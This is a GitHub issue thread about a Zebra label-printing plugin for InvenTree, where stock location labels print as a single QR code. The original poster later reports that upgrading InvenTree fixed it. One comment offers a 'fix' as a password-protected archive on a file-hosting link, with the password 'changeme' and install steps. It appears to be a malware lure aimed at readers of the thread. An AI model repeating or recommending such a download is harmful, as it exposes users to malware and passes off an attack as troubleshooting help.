### ISSUE TITLE
printing wrong label for stocklocation

### ISSUE THREAD

**Issue by Philipboy881** [SergeoLacruz/inventree-zebra-plugin#8]
when i print part label, stock item label and stock location label's to pdf i get my label as i wanted it to be
bot when i print a label to the zebra printer part label and stock item label goes as expected, but stock location is just aa single qrcode in the middle

 i am currently running inventree v0.14. bussy upgrading to v0.16.1 but there are a few errors down the road to getting it upgraded

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Philipboy881** [comment]
newer version on inventree fixes it
